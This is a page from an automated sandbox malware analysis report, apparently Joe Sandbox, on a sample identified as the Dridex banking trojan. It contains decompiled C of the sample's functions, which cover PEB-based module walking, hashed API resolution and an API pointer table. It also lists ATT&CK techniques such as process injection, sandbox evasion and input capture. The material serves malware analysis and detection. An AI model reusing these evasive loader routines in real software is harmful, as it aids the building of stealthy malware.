											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6F32DFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6f33d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6f33d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6F32E8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6F33306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6f33d2e4 = 1;
					E6F32F584( &(_t535[0x38]), 0);
					E6F32F584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6F32F4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6F33306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6F32F828( &(_t535[0xc]), E6F32F4CC( &(_t535[8])) + 0x14);
								_t369 = E6F32F4BC( &(_t535[0xc]), E6F32F4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6F32F654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6F32F584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6F32F654( &(_t535[8]));
							E6F32F654( &(_t535[0x164]));
							E6F32F584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6F32F584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6F331D34(0x60a28c5c);
							_t290 = E6F3312EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6F331C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6F32D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6F335CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6F335D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6F338E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6F32F654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6F32BB44( &(_t535[0x110]));
							}
							E6F32CFDC( &(_t535[0x104]));
							E6F32CFDC(_t518);
							E6F32CFDC( &(_t535[0x15c]));
							E6F32CFDC( &(_t535[0x154]));
							E6F3390EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6F32F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6F3390B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6F32F4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6F32F4CC( &(_t535[0x44]));
								_t519 =  *(0x6f33bd40 + _t381 * 4);
								_t531 = E6F33907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6F3387E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6F32F4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6F32F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6F32F4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6F32F828( &(_t535[0x20]), E6F32F4CC( &(_t535[0x1c])) + 8);
										E6F32F4BC( &(_t535[0x20]), E6F32F4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6F33317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6F32F828( &(_t535[0x48]), _t535[0x70]);
									E6F33317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6F32F840( &(_t535[0x44]), _t563);
									E6F32F840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6F33913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6F339104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6F32F654( &(_t535[0x144]));
									E6F32F654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6f33d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6F32F654( &(_t535[0x11c]));
							E6F338E68(_t381,  &(_t535[0xd8]));
							E6F32F654( &(_t535[0x1c]));
							E6F32F654( &(_t535[0x44]));
							E6F32F654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6F32F4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6F32F828( &(_t535[0x38]), E6F32F4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6F32F4BC( &(_t535[0x38]), E6F32F4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6F32F4BC( &(_t535[0xc]), _t62);
						_t455 = E6F32F4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6f331448
0x6f33144f
0x6f331452
0x6f331459
0x6f331bdb
0x6f331bdb
0x6f33145f
0x6f33146a
0x6f3319a9
0x6f3319ad
0x00000000
0x6f331c2c
0x6f3319b3
0x6f3319b6
0x6f3319b9
0x6f3319c3
0x6f3319d2
0x6f3319d4
0x6f3319db
0x6f331bc5
0x6f331bc7
0x6f331bca
0x6f331bce
0x00000000
0x6f331bce
0x6f3319ea
0x6f3319f5
0x6f3319fc
0x6f3319ff
0x6f331a01
0x6f331a04
0x6f331a07
0x6f331a0d
0x6f331a1b
0x6f331a2b
0x6f331a50
0x6f331a61
0x6f331a64
0x6f331a66
0x6f331aca
0x6f331acd
0x6f331acd
0x6f331acf
0x6f331ad2
0x6f331ad6
0x6f331ad6
0x6f331ada
0x00000000
0x00000000
0x6f331ae7
0x6f331aed
0x6f331b21
0x6f331b27
0x6f331b29
0x6f331bf8
0x6f331c00
0x6f331c03
0x6f331c05
0x6f331c1c
0x6f331c1c
0x6f331c07
0x6f331c0b
0x6f331c10
0x6f331c10
0x6f331c1e
0x6f331c24
0x6f331b43
0x6f331b43
0x6f331b45
0x6f331b45
0x6f331b47
0x6f331b47
0x6f331b4c
0x00000000
0x00000000
0x6f331b4e
0x6f331b4f
0x6f331b52
0x6f331b55
0x00000000
0x00000000
0x6f331b61
0x6f331b64
0x6f331b66
0x6f331b7d
0x6f331b7d
0x6f331b68
0x6f331b6c
0x6f331b71
0x6f331b71
0x6f331b8a
0x6f331b8d
0x6f331b96
0x6f331b99
0x6f331bbc
0x6f331bc0
0x00000000
0x6f331bc0
0x6f331ba1
0x6f331ba1
0x6f331bad
0x6f331bb0
0x6f331bb9
0x00000000
0x6f331bb9
0x6f331b2f
0x6f331b3f
0x6f331b3f
0x6f331b41
0x00000000
0x00000000
0x6f331b37
0x6f331b39
0x6f331b39
0x00000000
0x6f331b3f
0x6f331aef
0x6f331af7
0x6f331b17
0x6f331af9
0x6f331af9
0x6f331b01
0x6f331b0a
0x6f331b0a
0x6f331b01
0x00000000
0x6f331af7
0x6f331a68
0x6f331a6f
0x00000000
0x00000000
0x6f331a7c
0x6f331a82
0x6f331a87
0x6f331a8e
0x6f331a92
0x6f331aa7
0x6f331aa9
0x6f331aab
0x6f331ab1
0x6f331abf
0x6f331abf
0x6f331ac5
0x00000000
0x6f331ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6f331a0f
0x6f331a0f
0x6f331a0f
0x6f331a10
0x6f331a13
0x6f331a17
0x00000000
0x6f331a2d
0x6f331a30
0x6f331a33
0x6f331a3c
0x6f331a3f
0x6f331a40
0x6f331a42
0x00000000
0x6f33147d
0x6f33147f
0x6f331484
0x6f33148f
0x6f33149d
0x6f3314b0
0x6f3314bd
0x6f3314c6
0x6f3314ca
0x6f3314ce
0x6f331516
0x6f331516
0x6f331518
0x6f33151f
0x00000000
0x00000000
0x6f331538
0x6f331540
0x6f331544
0x6f331559
0x6f33155d
0x6f331561
0x6f33156a
0x6f331570
0x6f331573
0x6f331577
0x6f33157f
0x6f331581
0x6f331585
0x6f33158c
0x6f331595
0x6f331595
0x6f331599
0x6f3315ae
0x6f3315c4
0x6f3315d1
0x6f3315d2
0x6f3315d2
0x6f3315d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6f33158e
0x6f33158e
0x6f33158e
0x6f33158f
0x6f331590
0x00000000
0x6f33158e
0x6f331553
0x6f331557
0x00000000
0x00000000
0x00000000
0x6f3315d8
0x6f3315d8
0x6f3315d9
0x6f3315dc
0x6f3315e6
0x6f3315e6
0x6f3315ea
0x6f3315f1
0x6f33164c
0x6f331651
0x6f3316a4
0x6f3316a4
0x6f3316a8
0x6f3316ac
0x6f3314d6
0x6f3314d9
0x6f3314de
0x6f3314e4
0x6f3314e7
0x6f3314ee
0x6f3314f2
0x6f3314f9
0x6f331502
0x6f331506
0x6f33150a
0x6f331510
0x00000000
0x00000000
0x00000000
0x6f331510
0x6f3316b6
0x6f3316c2
0x6f3316cd
0x6f3316d4
0x6f3316dd
0x6f3316e7
0x6f3316e8
0x6f3316f6
0x6f3316fb
0x6f3316fc
0x6f331709
0x6f33170e
0x6f331720
0x6f331725
0x6f33172a
0x6f33173c
0x6f33174e
0x6f331753
0x6f33175e
0x6f331765
0x6f33176a
0x6f331772
0x6f33177b
0x6f33177b
0x6f331787
0x6f33178e
0x6f33179a
0x6f3317a6
0x6f3317b4
0x6f3317c5
0x6f3317cc
0x6f3317d1
0x6f3317da
0x6f3317df
0x6f3317e1
0x6f3317e5
0x6f3317e9
0x6f3317f6
0x6f331803
0x6f331807
0x6f33181b
0x6f33181f
0x00000000
0x00000000
0x6f331834
0x6f331836
0x6f33183e
0x6f33183b
0x6f33183b
0x6f33183b
0x6f331842
0x6f331844
0x6f33184a
0x6f331850
0x6f3318ac
0x6f3318b5
0x6f3318b9
0x6f3318c6
0x6f3318cf
0x6f3318d4
0x6f3318d8
0x6f3318db
0x6f33193c
0x6f331952
0x6f33195d
0x6f33195e
0x6f33195f
0x6f331963
0x6f331966
0x6f331be6
0x6f331be9
0x6f331be9
0x00000000
0x6f331966
0x6f3318e5
0x6f3318f5
0x6f3318fe
0x6f331907
0x6f331910
0x6f331911
0x6f331912
0x6f331917
0x6f33191f
0x6f331927
0x00000000
0x00000000
0x00000000
0x6f331929
0x6f331859
0x6f33185e
0x6f331862
0x6f331862
0x6f331866
0x6f331869
0x00000000
0x00000000
0x6f33188a
0x6f33188c
0x6f331890
0x6f331892
0x00000000
0x00000000
0x6f331894
0x6f33189b
0x6f3318a7
0x00000000
0x6f3318a7
0x6f33186e
0x00000000
0x6f33196c
0x6f33196c
0x6f33196d
0x6f33197d
0x6f331989
0x6f331992
0x6f33199b
0x6f3319a4
0x00000000
0x6f3319a4
0x6f331653
0x6f331655
0x6f331657
0x6f33165c
0x6f331661
0x6f331674
0x6f33168a
0x6f331693
0x6f331694
0x6f331694
0x6f331696
0x6f331697
0x6f33169a
0x6f33169e
0x00000000
0x6f331657
0x6f3315f3
0x6f3315fd
0x6f3315fe
0x6f3315fe
0x6f33160b
0x6f331617
0x6f331619
0x6f33161b
0x6f33161f
0x6f33162f
0x6f33162f
0x6f331636
0x6f331639
0x6f33163a
0x6f33163e
0x6f331648
0x00000000
0x6f331648

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c06bce725811d74243bb711ffaea880e0c10b2cf425946ad569ecd08d4a4cfd
Instruction ID: 5e5b5a6bdcc8e6f402a73ba90f050cf81097208267186de1b4ce86de82869643
Opcode Fuzzy Hash: 0c06bce725811d74243bb711ffaea880e0c10b2cf425946ad569ecd08d4a4cfd
Instruction Fuzzy Hash: 81329F72A083958FD714EF24C890AAFB7E4FF94304F10892DE5D58B2A1EB71E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6F326D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F326D0C() {

				 *0x6f33d280 = GetUserNameW;
				 *0x6F33D284 = MessageBoxW;
				 *0x6F33D288 = GetLastError;
				 *0x6F33D28C = CreateFileA;
				 *0x6F33D290 = DebugBreak;
				 *0x6F33D294 = FlushFileBuffers;
				 *0x6F33D298 = FreeEnvironmentStringsA;
				 *0x6F33D29C = GetConsoleOutputCP;
				 *0x6F33D2A0 = GetEnvironmentStrings;
				 *0x6F33D2A4 = GetLocaleInfoA;
				 *0x6F33D2A8 = GetStartupInfoA;
				 *0x6F33D2AC = GetStringTypeA;
				 *0x6F33D2B0 = HeapValidate;
				 *0x6F33D2B4 = IsBadReadPtr;
				 *0x6F33D2B8 = LCMapStringA;
				 *0x6F33D2BC = LoadLibraryA;
				 *0x6F33D2C0 = OutputDebugStringA;
				return 0x6f33d280;
			}

0x6f326d1d
0x6f326d25
0x6f326d28
0x6f326d37
0x6f326d3a
0x6f326d49
0x6f326d4c
0x6f326d5b
0x6f326d5e
0x6f326d6d
0x6f326d70
0x6f326d7f
0x6f326d82
0x6f326d91
0x6f326d94
0x6f326da3
0x6f326da6
0x6f326da9

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 402a45239dfb3a918c36106ad9ecbb0f0971a82112f5ba853e562a470feced9f
Instruction ID: 9a9a5c4c37e375ac0f024a308c5f0457a0a39ec5694367e5d22e699967df61cd
Opcode Fuzzy Hash: 402a45239dfb3a918c36106ad9ecbb0f0971a82112f5ba853e562a470feced9f
Instruction Fuzzy Hash: E61110BEA05A81CFCF68CF09D1948117BFABB8E32071181AED8098B365D734D865DF54

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.31369

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Function 6F330730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6F332234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6F332820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6F333138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 6F335E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Function 6F3310A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6F3357B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6F335B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 6F331166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6F335BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6F335BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6F335BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6F335BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6F335C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6F335E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6F33564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6F331030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6F333628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6F321494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6F32A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6F328428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6F339370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6F33143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6F326D0C, Relevance: .0, Instructions: 36
COMMON